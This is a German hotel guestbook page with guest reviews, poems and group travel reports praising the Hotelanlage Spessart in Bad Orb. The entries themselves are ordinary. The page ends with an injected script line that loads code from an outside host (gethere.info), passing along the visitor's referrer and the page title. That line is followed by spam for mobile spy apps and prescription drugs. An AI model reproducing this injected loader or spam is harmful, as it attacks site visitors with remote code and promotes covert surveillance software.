Gästebuch

Wenn Ihnen der Aufenthalt bei uns gefallen hat, Sie Lob oder Kritik an uns richten möchten, können Sie hier einen Eintrag in unserem Gästebuch vornehmen.

  • Manni schrieb: (9. Mai 2017)

    Ich komme aus dem Norden und habe in diesem Hotel letztes Jahr nach meiner Haushaltsauflösung, hier 2 Wochen Entspannung gesucht. Wirklich ein super Hotel. Mir hat die gegen so gut Gefallen dass ich mich gleich in Bad Orb niedergelassen haben.
    Vielen Dank für die Tolle Zeit.

  • Dr. med. Hans-Peter Legal schrieb: (28. Juli 2015)

    Internet-Kolumne Dr. med. Hans-Peter Legal
    „Hotelanlage Spessart“ (Bad Orb) – dort wo man sich gleich wohlfühlen kann

    Die traditionsreiche Kurstadt Bad Orb liegt im Mainz-Kinzig Kreis (Hessen), zwischen bewaldeten Bergen des Naturparks Spessart. Es ist eines der größten zusammenhängenden Waldgebiete Deutschlands. Jene gesunde Luft um das Gradierwerk kann jeden Urlaub zum optimalen Aufenthalt gestalten. Das gilt sicher auch für die moderne „Toskana Therme“. Diese alte Kulturgegend ist schon seit über 2000 Jahren besiedelt. Durch das Auffinden der salzhaltigen Quellen kam diese Gemeinde zur Blüte. Bad Orb ist seit 1909 ein staatlich anerkanntes Heilbad. Davon zeugen die zahlreichen Kurkliniken, Sanatorien und sehenswerten Jugendstilvillen im Ort. Aber man musste auch eine „Durststrecke“ beschreiten. Das hat sich jedoch in der letzten Zeit zum Positiven gewandelt. Jetzt scheint sich ein wirtschaftlicher Aufschwung anzubahnen. Jene Eröffnung der genannten „Toskana Therme“ brachte die Wende. Zahlreiche nette Hotels, Pensionen, rund um die alte Stadtmauer und an den Berghängen, sind beliebter Treffpunkt der Kurgäste, alljährlich. Dazu gibt es einige gute Restaurants, Cafes und Kneipen, welche dem Stadtbild Charakter verleihen. Kultur wird hier vom „Feinsten“ angeboten. Da seien Theater, Musical, Oper, Comedy, Feste im Kurpark oder Freilichtaufführungen erwähnt. Gern trifft man sich zu Tagungen, Konferenzen, Seminaren und anderen Veranstaltungen. Als Freizeitbetätigung sei Wandern zu aller erst genannt. Bad Orb ist eine Reise wert.

    Die Hotelanlage „Spessart“ ist sehr beliebt. Aufmerksame Gastgeber sind die Familie Horst. Sie besitzen genügend Kompetenz und Leidenschaft am Beruf. Die Küche ist vom Feinsten. Hier werden nur frische Produkte, bester Qualität verarbeitet. Alle Zimmer sind stilvoll, behaglich und ruhig mit schönen Ausblick. Es besteht ein faires Preis-, Leistungsverhältnis. In einem Übersichtsartikel, jegliche Details aufzuzählen, würde den Rahmen sprengen. Eher rate ich, das Haus mal selbst aufzusuchen – es lohnt sich gewiss immer. Ein Sprichwort von Goethe besagt: „Kein Genuss ist vorübergehend, denn der Eindruck den er hinterlässt ist bleibend“. Meine Empfehlung ist voll gegeben.

    Dr. med. Hans-Peter Legal
    http://www.dr-legal.de

  • B.Brüggen schrieb: (29. März 2015)

    Bad Orb über Weihnachten und Neujahr 2014/2015
    Hier bist Du willkommen zu jeder Zeit.

    Das Spessart Hotel lädt zum Verweilen ein.
    In gepflegter Atmosphäre, bei gutem Essen, einem Glas Wein.
    Wer könnte da nicht zufrieden sein.
    Mit viel Liebe und bedacht wird es den Gästen recht gemacht.
    Man sitzt zusammen in froher Runde
    so vergeht so manche schöne Stunde.
    Niemand ist hier allein
    wie könnte es auch anders sein.
    Caritas heißt Nächstenliebe.
    Zum Entspannen gibt es die Therme…
    bei Ruhe und wohliger Wärme.
    Musik gibt es für alle
    in der wunderbaren Konzerthalle.
    Im Kurpark, am Entenweiher geh vorbei!
    Da grüßen dich die Enten eins, zwei, drei
    Das ganze Umfeld ist sehr schön
    man muss es nur mit offene Augen sehn.

    Über Nacht kam der Winter…
    zur Freude vieler Kinder.
    Eine Kutschfahrt bei Sonnenschein…
    was kann noch schöner sein.
    Der Urlaub geht zu Ende…
    man reicht sich zum Abschied noch die Hände.
    Ein Wintermärchen wurde wahr…
    Wir kommen wieder im nächsten Jahr.

  • Caritas Seniorenreisen schrieb: (17. März 2014)

    Reisebericht, Freizeit vom 3. bis 17.06.2013 im Hotel „Spessart“ Bad Orb
    Nach wochenlangem „Schlechtwetter“ im Erftkreis machten wir (28 Teilnehmer/innen) uns auf die Reise nach Bad Orb. Hier erlebten wir schöne, erholsame und erlebnisreiche Tage. Wir waren überrascht vom großzügigen Kurpark, geradezu üppig bepflanzt waren Rabatten, Beete und Kübel. Unser Hotel lag direkt am Kurpark und Anwendungen konnten gleich in der Therapiepraxis nebenan genommen werden. Auch die wunderschöne „Toskana-Therme“ war nur einige Schritte entfernt.
    Morgens nach dem Frühstück und einer kleinen Gymnastik mit Spielen und Entspannung ging es zur längsten Saline in Hessen (156 Meter), bot sie uns doch ein Klima wie am Meeresstrand. Anschließend ging es in den Kurpark oder auf die Einkaufsmeile zum shoppen. Bei einer historischen Altstadtführung haben wir viel geschichtsträchtiges über Bad Orb erfahren. Erkunden mussten wir auch noch den „Barfußpfad“, 4,5 Kilometer lang.
    Unsere erste Ausflugsfahrt ging durch den schönen Spessart nach Bad Kissingen. Fast zwei Stunden Fahrt durch grüne Wälder und weite Felder, keine Industrie, Autobahnen oder Windkrafträder! Alle waren von dieser Fahrt begeistert.
    Die zweite Fahrt ging durch den bayrischen Spessart nach Aschaffenburg, auch sehr sehenswert.
    Beim großen Erdbeerfest waren wir natürlich dabei, ein 200 Meter langer Erdbeerkuchen wollte probiert werden. Erdbeerwein, Erdbeerbowle und Erdbeereis konnte getestet werden. Dazu spielte der Musikverein Kassel auf. Ebenfalls wurde eine Planwagenfahrt durch die Altstadt zum Cafe` „Waldfrieden“ unternommen.
    Abends spielten wir Bingo, Brett- oder Kartenspiele. An unserem letzen Sonntag erlebten wir ein sehr schönes Konzert mit den „Sorgenbrechern“, deren einfühlsame Melodien wir immer noch im Ohr haben.
    Nach einem lustigen Abschiedsabend wurden wir am Morgen unserer Abreise von unseren Gastgebern mit einem Gläschen Sekt verabschiedet. Die Rückreise erfolgte ganz problemlos und gegen Mittag waren wir wieder im Rhein-Erft-Kreis.

    Freude am Leben
    Wie mit den Lebenszeiten, so ist es auch mit den Tagen:
    Keiner ist uns genug, keiner ist ganz schön,
    jeder hat seine Unvollkommenheit.
    Aber rechne sie zusammen, so kommt eine Summe
    Freude und Leben heraus!
    (Fr. Hölderlin)

  • Ursula Benner schrieb: (23. Mai 2013)

    Oster-Reise nach Bad Orb „Hotelanlage Spessart“

    Meine erste Graf-Reise war bereits ein voller Erfolg.
    Die Beschreibung im Katalog trifft in jeder Hinsicht bestens zu.
    Das Essen war ausgezeichnet.
    Die Geschwister Horst sind sehr kompetente und freundliche Wirtsleute.

  • Caritasverband Rhein-Erft-Kreis e.V. schrieb: (23. Mai 2013)

    Bad Orb im Wonnemonat Mai.

    Hotelanlage Spessart, ein absolutes Muss für jeden, der für ein paar Tage Entspannung, Erholung und Heilung durch traditionelle und klassische Naturheilverfahren erleben will. Direkt im Nachbarhaus befindet sich eine Institution in der sämtliche Formen von physiotherapeutischen Maßnahmen durchgeführt werden können. In der Hotelanlage selbst hatten wir Zugang zu einem tollen Schwimmbad, in welchen wir jeden Morgen unsere Wassergymnastik durchführen konnten. Wir durften außerdem jede Zeit die angrenzende Sauna benutzen. Wer nicht ins Wasser wollte, konnte an der Trockengymnastik teilnehmen, um Körper und Geist ein wenig auf Trab zu bringen.
    Gleich gegenüber der Hotelanlage befindet sich ein großer Besinnungswald mit vielen Ruhebänken und „Trimm Dich“ Geräten für Erwachsene. Ein kurzer Weg führt zur Therme. Die Altstadt ist unmittelbar gut zu Fuß zu erreichen.
    Mit unseren Kurkarten konnten wir uns von jedem Ausflug mit dem Stadtbus (behindertengerecht) zurück zum Hotel fahren lassen.
    Wir hatten Glück , den an unserem Wochenende wurde im Kurpark eine Gartenausstellung organisiert. Die Atmosphäre war freundlich. Leise Musik begleitete uns durch den Kurpark. Das Wetter spielte auch noch mit. Wir fühlten und rundherum pudelwohl. Erwähnenswert ist auch, dass im Lesesaal alle zwei Tage ein Kurkonzert stattfand, welches wir teils mit großer Begeisterung besuchten. Wer mochte , konnte an und um das Gradierwerk spazieren gehen. Neben unserem Aufenthalt in Bad Orb , machten wir auch einen Ausflug nach Fulda mit Bus und Bahn. Dies wurde gut organisiert und wir haben im schönen Kurpark ein ruhiges Picknick gemacht. Die Besichtigungen von Dom und Schloss waren zudem echte Höhepunkte unserer Tour. Der nächste Höhepunkt der etwas anderen Art , war die 3- PS Planwagenfahrt zum wenige Kilometer entfernt liegenden Tierpark. Wer wollte hatte danach die Chance , den Barfußweg zurück zur Hotelanlage zu erleben. Durch Wasser, Sand und Matsch turnten verschiedene Abenteuerer zurück, ständig begleitet von einem schwarzhaarigen Vierbeiner.
    Unsere junge Hotelfachfrau mit Mannschaft ermöglichte uns auch einen musikalischen Abend mit Akkordeon und Hammondorgel an Mutter- und Vatertag. Unsere Gruppe hatte diesen Abend witzige sketche und Lieder einstudiert, welche mit viel Spass und Gelächter präsentiert wurden.
    Zuletzt verabschiedete sich unsere Gastgeberin mit Pralinen und Sekt. Ihre gute Küche und den schnellen Service werden wir sehr vermissen.
    Diesen Urlaub werden wir so schnell nicht vergessen!

  • Sportverein Ältere Generation schrieb: (21. April 2013)

    Ideales Haus für Gruppenreisen.
    Wir waren mit unserem Senioren Sportverein mit 2 Gruppen 2×12 Tage im Hotel Spessart. Ich müsste Negativpunkte wirklich suchen. Essen vorzüglich, Frühstück mit Bio-Ecke, Obst, Wurst, Käse, Ei einfach alles was das Herz begehrt. Für ein reichhaltiges Programm für die Gruppen war gesorgt ( Bingo, Tanzabend, Grillabend, Nachtwächterrundgang usw.) Die Zimmer waren sauber und das gesamte Personal war um unser Wohlbefinden bemüht. Kann nur empfohlen werden.

  • O. Hage schrieb: (30. Mai 2012)

    Wir waren schon mehrfach zu Gast in der Hotelanlage Spessart,
    sowohl privat als auch mit Seminargruppen.
    Wir können das Hotel sehr empfehlen.
    Sehr freundlicher und immer hilfsbereiter Service.
    Sehr gutes Frühstück.
    Auch Grillabende für die Seminargruppe wurden ohne Probleme
    komplett von der Hotelleitung organisiert!
    Die Toskana-Therme ist in direkter Nachbarschaft und der
    Kurpark liegt genau gegenüber.
    Wir freuen uns auf den nächsten Besuch!

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.The most popular 2017 spy software applications for the mobile phones. canadian prescriptionc